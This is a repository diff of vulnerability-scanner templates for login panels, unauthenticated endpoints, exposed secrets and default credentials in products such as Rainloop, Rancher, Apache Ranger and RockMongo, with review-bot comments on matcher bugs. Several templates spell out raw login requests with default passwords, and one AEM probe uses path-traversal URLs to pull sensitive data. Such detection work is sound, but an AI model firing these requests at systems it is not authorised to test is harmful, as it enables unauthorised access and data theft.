b/poc/auth/pinpoint-unauth-9588.yaml @@ -1,20 +1,15 @@ id: pinpoint-unauth - info: name: PinPoint Unauth author: dhiyaneshDk severity: high reference: - https://github.com/pinpoint-apm/pinpoint - metadata: - max-request: 1 - tags: pippoint,unauth,misconfig - -http: + tags: pippoint,unauth +requests: - method: GET path: - '{{BaseURL}}/applications.pinpoint' - matchers-condition: and matchers: - type: word @@ -23,14 +18,10 @@ http: - "serviceType" condition: and part: body - - type: word words: - "application/json" part: header - - type: status status: - 200 - -# digest: 4a0a004730450220720fec38cacd36fac5790e2ae1d018a85439dd251463f8bb4424280af848f289022100e4ae98631a71d2271022a079a35d2a34af8d16c9df88e65930566ef5ff757e0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pinpoint-unauth-9590.yaml b/poc/auth/pinpoint-unauth-9590.yaml deleted file mode 100644 index a36b59fbc2..0000000000 --- a/poc/auth/pinpoint-unauth-9590.yaml +++ /dev/null 
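Review bot: In pieregister-plugin-open-redirect.yaml the first line `id: wptouch-plugin-open-redirect` is left unchanged while the name, reference, severity and request path are all switched to the Pie Register check (`piereg_logout_url`), so results will be reported under the WPTouch identifier for a different plugin. That mislabels findings and may cause them to be suppressed or de-duplicated against a genuine WPTouch template. Change the first line to an id that names the plugin, e.g. `id: pieregister-plugin-open-redirect`, and consider keeping the `wordpress` tag that the hunk drops so tag-based runs still select it. The template continues past the end of the hunk, so the matcher regex is not reviewed here.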
@@ -1,27 +0,0 @@ -id: pinpoint-unauth -info: - name: PinPoint Unauth - author: dhiyaneshDk - severity: high - reference: - - https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth -requests: - - method: GET - path: - - '{{BaseURL}}/applications.pinpoint' - matchers-condition: and - matchers: - - type: word - words: - - "applicationName" - - "serviceType" - condition: and - part: body - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/poc/auth/plastic-scm-login.yaml b/poc/auth/plastic-scm-login.yaml index 8584a79771..526875d044 100644 --- a/poc/auth/plastic-scm-login.yaml +++ b/poc/auth/plastic-scm-login.yaml @@ -1,32 +1,19 @@ id: plastic-scm-login - info: - name: Unity Plastic SCM Login Panel - Detect + name: Plastic SCM Login author: dhiyaneshDK severity: info - description: Unity Plastic SCM login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Plastic SCM" + reference: https://www.shodan.io/search?query=http.title%3A%22Log+in+-+Plastic+SCM%22 tags: panel,plastic - -http: +requests: - method: GET path: - '{{BaseURL}}/account' - matchers-condition: and matchers: - type: word words: - '<title>Log in - Plastic SCM' - - type: status status: - 200 - -# digest: 4a0a0047304502210080022742b1dcf9221e651e2f076660f08d527dbd31841bba478c458a05d3067a02204afd368d82436692176af630dec0a5264cb3e65cef6dc633626d24edf682bc9b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/polycom-login-9625.yaml b/poc/auth/polycom-login-9625.yaml deleted file mode 100644 index 29489ef1a1..0000000000 --- a/poc/auth/polycom-login-9625.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: polycom-login -info: - name: Polycom Login - author: DhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6863 - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}/login.html" - matchers-condition: and - matchers: - - type: word - words: - - "Polycom Login" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/polycom-login-9627.yaml b/poc/auth/polycom-login-9627.yaml new file mode 100644 index 0000000000..ec8f498c53 --- /dev/null +++ b/poc/auth/polycom-login-9627.yaml @@ -0,0 +1,21 @@ +id: polycom-login +info: + name: Polycom Login + author: DhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6863 + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/login.html" + matchers-condition: and + matchers: + - type: word + words: + - "Polycom Login" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/polycom-login.yaml b/poc/auth/polycom-login.yaml index ec8f498c53..f2341a845d 100644 --- a/poc/auth/polycom-login.yaml +++ b/poc/auth/polycom-login.yaml @@ -1,21 +1,34 @@ id: polycom-login + info: - name: Polycom Login + name: Polycom Login Panel - Detect author: DhiyaneshDk severity: info + description: Polycom login panel was detected. reference: - https://www.exploit-db.com/ghdb/6863 - tags: panel -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel + +http: - method: GET path: - "{{BaseURL}}/login.html" + matchers-condition: and matchers: - type: word words: - "Polycom Login" part: body + - type: status status: - 200 + +# digest: 4a0a0047304502202140972e05f30b61614cde26fcb94562cca5b1136d02aa23272a2f1b29893377022100a77cc0a4be6d7dcaea2eabf10076816a047789a25faf44e38f41b16b94d7fd00:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/possible-AEM-secrets.yaml b/poc/auth/possible-AEM-secrets.yaml deleted file mode 100644 index 198c19fcd3..0000000000 --- a/poc/auth/possible-AEM-secrets.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: aem-secrets - -info: - name: AEM Secrets - Sensitive Information Disclosure - author: boobooHQ,j3ssie - severity: high - description: | - Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. - reference: - - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ - metadata: - verified: true - max-request: 2 - tags: aem,adobe,misconfig,exposure - -http: - - method: GET - path: - - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"jcr:uuid"' - - '"jcr:createdBy"' - - '"uri"' - condition: and - - - type: word - part: header - words: - - application/json - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100f26aef400ffc895f1d84d377c7c8889af3a56490902382de4d7e2504f59b48bc02210090f54e744e9f760d4a740a9b6d7fe6a61d4904e4823b4d43318598fd8b2b10ce:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/private-key-9655.yaml b/poc/auth/private-key-9655.yaml index 3e779effd4..282a2ab3a0 100644 --- a/poc/auth/private-key-9655.yaml +++ b/poc/auth/private-key-9655.yaml @@ -1,15 +1,12 @@ id: private-key - info: name: Private Key Detect author: gaurang,geeknik severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: 
diff --git a/poc/auth/project-insight-login.yaml b/poc/auth/project-insight-login.yaml index cc38d84bec..25ca7743a1 100644 --- a/poc/auth/project-insight-login.yaml +++ b/poc/auth/project-insight-login.yaml @@ -1,23 +1,35 @@ id: project-insight-login + info: - name: Project Insight - Login + name: Project Insight Login Panel - Detect author: dhiyaneshDk severity: info + description: Project Insight login panel was detected. reference: - https://www.exploit-db.com/ghdb/7413 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Project Insight - Login" - tags: panel -requests: + tags: panel,edb + +http: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: - type: word part: body words: - "Project Insight - Login" + - type: status status: - 200 + +# digest: 4a0a004730450220101009023509eb13aaf56447e9cbbb0110d2919060f5830f081b9411ff8b2c88022100e6962fcfd9c3c738f7b95bca52cef9a2338266fe4a7eaea468b990eeb1274141:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pure-storage-login.yaml b/poc/auth/pure-storage-login.yaml index e7bbc2ea59..ff24e5c6a3 100644 --- a/poc/auth/pure-storage-login.yaml +++ b/poc/auth/pure-storage-login.yaml 
@@ -1,32 +1,20 @@ id: pure-storage-login - info: - name: Pure Storage Login Panel - Detect + name: Pure Storage Login author: dhiyaneshDK severity: info - description: Pure Storage login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 - shodan-query: http.title:"Pure Storage Login" + shodan-query: 'http.title:"Pure Storage Login"' tags: panel,purestorage - -http: +requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'Pure Storage Login' - - type: status status: - 200 - -# digest: 4a0a00473045022100d24b176bc0f6e299a1546685d715f883ee304205ae646cbc43e439a831e4defa02202def8b2dac9de67ecaf199a8b19f61383664f189b17e86eab4102361c0c9d634:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/putty-private-key-disclosure-9732.yaml b/poc/auth/putty-private-key-disclosure-9730.yaml similarity index 100% rename from poc/auth/putty-private-key-disclosure-9732.yaml rename to poc/auth/putty-private-key-disclosure-9730.yaml diff --git a/poc/auth/r-webserver-login.yaml b/poc/auth/r-webserver-login.yaml index 94dfe34794..5e2be9c394 100644 --- a/poc/auth/r-webserver-login.yaml +++ b/poc/auth/r-webserver-login.yaml 
@@ -1,19 +1,33 @@ id: r-webserver-login + info: - name: R WebServer Login + name: R WebServer Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7132 - tags: panel,rwebserver -requests: + description: R WebServer login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7132 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,panel,rwebserver + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "R WebServer" + - type: status status: - 200 + +# digest: 490a00463044022065379692db243fa1d115f286378173a32b973de295c34e846b5c5ef0c3132dc50220658f791bd86e5cdfb9e31fdeb4d355ca18db17b33f97e7e6aa073bbbbdfda42a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/rabbitmq-default-login-9783.yaml b/poc/auth/rabbitmq-default-login-9783.yaml index fba1be66cd..4497061308 100644 --- a/poc/auth/rabbitmq-default-login-9783.yaml +++ b/poc/auth/rabbitmq-default-login-9783.yaml @@ -1,18 +1,10 @@ id: rabbitmq-default-login info: - name: RabbitMQ Default Login + name: RabbitMQ admin Default Login author: fyoorer,dwisiswant0 severity: high - description: RabbitMQ default admin credentials were discovered. tags: rabbitmq,default-login - reference: - - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: @@ -42,5 +34,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/rabbitmq-default-login-9786.yaml b/poc/auth/rabbitmq-default-login-9786.yaml index 9d549477c7..eb3b119d26 100644 --- a/poc/auth/rabbitmq-default-login-9786.yaml +++ b/poc/auth/rabbitmq-default-login-9786.yaml 
@@ -1,17 +1,9 @@ id: rabbitmq-default-login info: - name: RabbitMQ Default Login + name: RabbitMQ admin Default Login author: fyoorer,dwisiswant0 severity: high - description: RabbitMQ default admin credentials were discovered. tags: rabbitmq,default-login - reference: - - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -38,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/rails-secret-token-disclosure-9809.yaml b/poc/auth/rails-secret-token-disclosure-9809.yaml deleted file mode 100644 index 387218b6c6..0000000000 --- a/poc/auth/rails-secret-token-disclosure-9809.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: rails-secret-token-disclosure -info: - name: Ruby on Rails Secret Token Disclosure - author: dhiyaneshDk - severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json - tags: exposure,files,rails,ruby,token -requests: - - method: GET - path: - - "{{BaseURL}}/config/initializers/secret_token.rb" - matchers-condition: and - matchers: - - type: word - words: - - "secret_key_base =" - - "config.secret_token =" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/rails-secret-token-disclosure-9810.yaml b/poc/auth/rails-secret-token-disclosure-9810.yaml new file mode 100644 index 0000000000..8505b6ebc5 --- /dev/null +++ b/poc/auth/rails-secret-token-disclosure-9810.yaml 
@@ -0,0 +1,23 @@ +id: rails-secret-token-disclosure +info: + name: Ruby on Rails Secret Token Disclosure + author: dhiyaneshDk + severity: medium + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + tags: exposure,files,rails,ruby,token +requests: + - method: GET + path: + - "{{BaseURL}}/config/initializers/secret_token.rb" + matchers-condition: and + matchers: + - type: word + words: + - "secret_key_base =" + - "config.secret_token =" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/rails-secret-token-disclosure.yaml b/poc/auth/rails-secret-token-disclosure.yaml index 8505b6ebc5..387218b6c6 100644 --- a/poc/auth/rails-secret-token-disclosure.yaml +++ b/poc/auth/rails-secret-token-disclosure.yaml @@ -3,8 +3,7 @@ info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json tags: exposure,files,rails,ruby,token requests: - method: GET diff --git a/poc/auth/rainloop-default-login-9811.yaml b/poc/auth/rainloop-default-login-9811.yaml index 48b5f927a4..3fe1e87d21 100644 --- a/poc/auth/rainloop-default-login-9811.yaml +++ b/poc/auth/rainloop-default-login-9811.yaml 
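Review bot: In poc/auth/rails-secret-token-disclosure-9810.yaml the body matcher lists `secret_key_base =` and `config.secret_token =` under `condition: and`, so an exposed `secret_token.rb` that sets only one of the two is not reported. `condition: or` would cover both layouts, and the `status: 200` matcher still bounds the result. The template also has no `description`; one sentence saying that the file holds the application's signing secret, and that a hit means the file should be taken out of the web root and the secret rotated, would tell the reader what to do with a finding.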
@@ -1,23 +1,20 @@ id: rainloop-default-login info: - name: Rainloop WebMail - Default Admin Login + name: Rainloop WebMail Default Login author: For3stCo1d severity: high - description: Rainloop WebMail default admin login credentials were successful. - reference: - - https://github.com/RainLoop/rainloop-webmail/issues/28 + reference: https://github.com/RainLoop/rainloop-webmail/issues/28 metadata: - verified: true - max-request: 2 fofa-query: app="RAINLOOP-WebMail" - tags: default-login,rainloop,webmail,foss + tags: rainloop,webmail,default-login,foss -http: +requests: - raw: - | # Login Portal: /?admin GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} + - | POST /?/Ajax/&q[]=/0/ HTTP/2 Host: {{Hostname}} @@ -29,9 +26,11 @@ http: payloads: user: - admin + pass: - 12345 + cookie-reuse: true extractors: - type: regex name: token @@ -50,6 +49,4 @@ http: - type: status status: - - 200 - -# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950 + - 200 \ No newline at end of file diff --git a/poc/auth/rainloop-default-login.yaml b/poc/auth/rainloop-default-login.yaml new file mode 100644 index 0000000000..8e4ea4426f --- /dev/null +++ b/poc/auth/rainloop-default-login.yaml 
@@ -0,0 +1,44 @@ +id: rainloop-default-login +info: + name: Rainloop WebMail Default Login + author: For3stCo1d + severity: high + reference: https://github.com/RainLoop/rainloop-webmail/issues/28 + metadata: + fofa-query: app="RAINLOOP-WebMail" + tags: rainloop,webmail,default-login,foss +requests: + - raw: + - | # Login Portal: /?admin + GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /?/Ajax/&q[]=/0/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork + payloads: + user: + - admin + pass: + - 12345 + cookie-reuse: true + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - 'token":"(.+?)"' + matchers-condition: and + matchers: + - type: word + words: + - '"Action":"AdminLogin"' + - '"Result":true' + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/rancher-default-login-9814.yaml b/poc/auth/rancher-default-login-9814.yaml index 071cb9f045..a692cff35d 100644 --- a/poc/auth/rancher-default-login-9814.yaml +++ b/poc/auth/rancher-default-login-9814.yaml @@ -8,20 +8,20 @@ info: reference: - https://github.com/rancher/rancher - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + tags: default-login,rancher,kubernetes,devops,cloud classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 2 - tags: default-login,rancher,kubernetes,devops,cloud -http: +requests: - raw: - | GET /v3/settings/first-login HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + - | POST /v3-public/localProviders/local?action=login HTTP/1.1 Host: {{Hostname}} 
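Review bot: poc/auth/rainloop-default-login.yaml is added with the same `id: rainloop-default-login` and the same two raw requests as the new side of rainloop-default-login-9811.yaml in the preceding hunk. Unless the runner de-duplicates by id, a scan over poc/auth submits the admin login attempt twice per target and reports one finding under two files. Keeping one copy per id avoids the extra authentication attempts and duplicate results; ranger-default-login-9827.yaml and rockmongo-default-login-9897.yaml are added beside same-id siblings in the same way. The added copy also lacks the `description` and `max-request` fields that the removed side of the 9811 hunk carried, so a hit comes without any explanation of the finding.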
@@ -38,7 +38,6 @@ http: password: - admin attack: pitchfork - matchers-condition: and matchers: - type: status @@ -59,4 +58,4 @@ http: regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' -# digest: 4b0a00483046022100b130781bfb5cfc0f2b6cab42388fe47a3ff3661a5f8e3d4bee3a43dcee20ae4b0221008b9872679be89384dd66111bb7d0b271e17db41aaaf0cddc2ccae91a78a8c022:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rancher-default-login-9815.yaml b/poc/auth/rancher-default-login-9815.yaml index d189f6d141..071cb9f045 100644 --- a/poc/auth/rancher-default-login-9815.yaml +++ b/poc/auth/rancher-default-login-9815.yaml @@ -1,4 +1,5 @@ id: rancher-default-login + info: name: Rancher Default Login author: princechaddha @@ -11,8 +12,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 2 tags: default-login,rancher,kubernetes,devops,cloud -requests: + +http: - raw: - | GET /v3/settings/first-login HTTP/1.1 @@ -27,21 +31,25 @@ requests: Content-Length: 136 {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'R_SESS=token' part: header + extractors: - type: regex name: csrf @@ -51,4 +59,4 @@ requests: regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' -# Enhanced by mp on 2022/03/11 +# digest: 4b0a00483046022100b130781bfb5cfc0f2b6cab42388fe47a3ff3661a5f8e3d4bee3a43dcee20ae4b0221008b9872679be89384dd66111bb7d0b271e17db41aaaf0cddc2ccae91a78a8c022:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ranger-default-login-9827.yaml b/poc/auth/ranger-default-login-9827.yaml new file mode 100644 index 0000000000..34e46cbd76 --- /dev/null +++ b/poc/auth/ranger-default-login-9827.yaml 
@@ -0,0 +1,39 @@ +id: ranger-default-login + +info: + name: Apache Ranger Default Login + author: For3stCo1d + severity: high + reference: https://github.com/apache/ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + tags: apache,ranger,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"statusCode":200' + - '"msgDesc":"Login Successful"' + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/ranger-default-login-9828.yaml b/poc/auth/ranger-default-login-9828.yaml index 34e46cbd76..33536c3057 100644 --- a/poc/auth/ranger-default-login-9828.yaml +++ b/poc/auth/ranger-default-login-9828.yaml @@ -1,15 +1,22 @@ id: ranger-default-login info: - name: Apache Ranger Default Login + name: Apache Ranger - Default Login author: For3stCo1d severity: high - reference: https://github.com/apache/ranger + description: Apache Ranger contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/ranger + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: + max-request: 1 shodan-query: http.title:"Ranger - Sign In" tags: apache,ranger,default-login -requests: +http: - raw: - | POST /login HTTP/1.1 @@ -37,3 +44,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402203bf53c048783b3bfa9ae3b589a837d7490de17871f806fdd517ec3f32b79d9b60220319afc2bd265b8457db14da8706c7852f329078070f5b51a82132229b4b31462:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/ricoh-weak-password-9880.yaml b/poc/auth/ricoh-weak-password-9880.yaml index da512f2063..55816ca5f7 100644 --- a/poc/auth/ricoh-weak-password-9880.yaml +++ b/poc/auth/ricoh-weak-password-9880.yaml @@ -4,17 +4,18 @@ info: name: Ricoh Default Login author: gy741 severity: high - tags: ricoh,default-login description: Ricoh default admin credentials were discovered. reference: - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + max-request: 1 + tags: ricoh,default-login -requests: +http: - raw: - | POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 @@ -39,4 +40,4 @@ requests: status: - 302 -# Enhanced by mp on 2022/03/11 +# digest: 490a0046304402205f1bd4059a6971b29531d16085fd70128e711082039224c7a09df177efae92e502206a2179161b61c2edd0419ce743f386a7ad9ccec0e2b79622f70ba6a9f6bd3f78:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ricoh-weak-password-9882.yaml b/poc/auth/ricoh-weak-password-9882.yaml index 55816ca5f7..4e068463c9 100644 --- a/poc/auth/ricoh-weak-password-9882.yaml +++ b/poc/auth/ricoh-weak-password-9882.yaml @@ -1,5 +1,4 @@ id: ricoh-default-login - info: name: Ricoh Default Login author: gy741 @@ -11,11 +10,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 1 tags: ricoh,default-login - -http: +requests: - raw: - | POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 
@@ -23,21 +19,18 @@ http: Cookie: cookieOnOffChecker=on; wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open= - payloads: username: - admin attack: pitchfork - matchers-condition: and matchers: - type: regex regex: - 'wimsesid=[0-9]+' part: header - - type: status status: - 302 -# digest: 490a0046304402205f1bd4059a6971b29531d16085fd70128e711082039224c7a09df177efae92e502206a2179161b61c2edd0419ce743f386a7ad9ccec0e2b79622f70ba6a9f6bd3f78:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rockmongo-default-login-9897.yaml b/poc/auth/rockmongo-default-login-9897.yaml new file mode 100644 index 0000000000..b8990a1d84 --- /dev/null +++ b/poc/auth/rockmongo-default-login-9897.yaml @@ -0,0 +1,47 @@ +id: rockmongo-default-login + +info: + name: Rockmongo Default Login + author: pikpikcu + severity: high + description: Rockmongo default admin credentials were discovered. + tags: rockmongo,default-login + reference: + - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + POST /index.php?action=login.index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/index.php?action=login.index + + more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "Location: /index.php?action=admin.index&host=0" + - "Set-Cookie: ROCK_LANG=" + part: header + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rockmongo-default-login-9899.yaml b/poc/auth/rockmongo-default-login-9899.yaml index c194ac4f25..eaa5d79c7b 100644 
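Review bot: In the added poc/auth/rockmongo-default-login-9897.yaml the header word matcher lists `Location: /index.php?action=admin.index&host=0` and `Set-Cookie: ROCK_LANG=` without a `condition`, so either string alone satisfies it. A 302 that only sets the language cookie would then be reported as a successful default login; whether a rejected login produces such a response cannot be confirmed from here. Adding `condition: and` under that matcher makes the redirect to `admin.index` mandatory. The same matcher appears as unchanged context in rockmongo-default-login-9899.yaml, and the two-word body matcher in samsung-wlan-default-login-10018.yaml has the same shape and may deserve the same check. The empty `cve-id:` key under `classification` carries no value and can be dropped.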
--- a/poc/auth/rockmongo-default-login-9899.yaml +++ b/poc/auth/rockmongo-default-login-9899.yaml @@ -1,4 +1,5 @@ id: rockmongo-default-login + info: name: Rockmongo Default Login author: pikpikcu @@ -10,8 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: rockmongo,default-login -requests: + +http: - raw: - | POST /index.php?action=login.index HTTP/1.1 @@ -20,12 +24,14 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: username: - admin password: - admin attack: pitchfork + matchers-condition: and matchers: - type: word @@ -33,8 +39,9 @@ requests: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header + - type: status status: - 302 -# Enhanced by mp on 2022/03/11 +# digest: 4a0a00473045022100e38c9a57e4d88c9f038c701b6560797dad2f92de005ed2a726f7bc07660b27dd022064431cf3bab0caefb9392df1787aa92f28050b578b72c0863fab2aa1b37dc25b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/routeros-login-9908.yaml b/poc/auth/routeros-login-9909.yaml similarity index 100% rename from poc/auth/routeros-login-9908.yaml rename to poc/auth/routeros-login-9909.yaml diff --git a/poc/auth/routeros-login.yaml b/poc/auth/routeros-login.yaml deleted file mode 100644 index d4e3940ea9..0000000000 --- a/poc/auth/routeros-login.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: routeros-login -info: - name: RouterOS Router Login Detect - author: dhiyaneshDK,idealphase - severity: info - metadata: - shodan-query: http.title:"RouterOS router configuration page" - tags: panel,router,routeros -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'RouterOS router configuration page' - - type: status - status: - - 200 - extractors: - - type: regex - group: 1 - regex: - - '

RouterOS v(.+)<\/h1>' diff --git a/poc/auth/rseenet-default-login-9913.yaml b/poc/auth/rseenet-default-login-9913.yaml index 8312a43357..80dfe96d37 100644 --- a/poc/auth/rseenet-default-login-9913.yaml +++ b/poc/auth/rseenet-default-login-9913.yaml @@ -1,10 +1,17 @@ id: rseenet-default-login + info: name: Advantech R-SeeNet Default Login author: princechaddha severity: high + description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. reference: https://icr.advantech.cz/products/software/r-seenet tags: rseenet,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -33,3 +40,5 @@ requests: part: body words: - "User is succesfully logged." + +# Enhanced by mp on 2022/03/11 diff --git a/poc/auth/rseenet-default-login-9914.yaml b/poc/auth/rseenet-default-login-9914.yaml index 13c1e85697..fb18e8e12d 100644 --- a/poc/auth/rseenet-default-login-9914.yaml +++ b/poc/auth/rseenet-default-login-9914.yaml @@ -4,13 +4,13 @@ info: author: princechaddha severity: high description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. - reference: - - 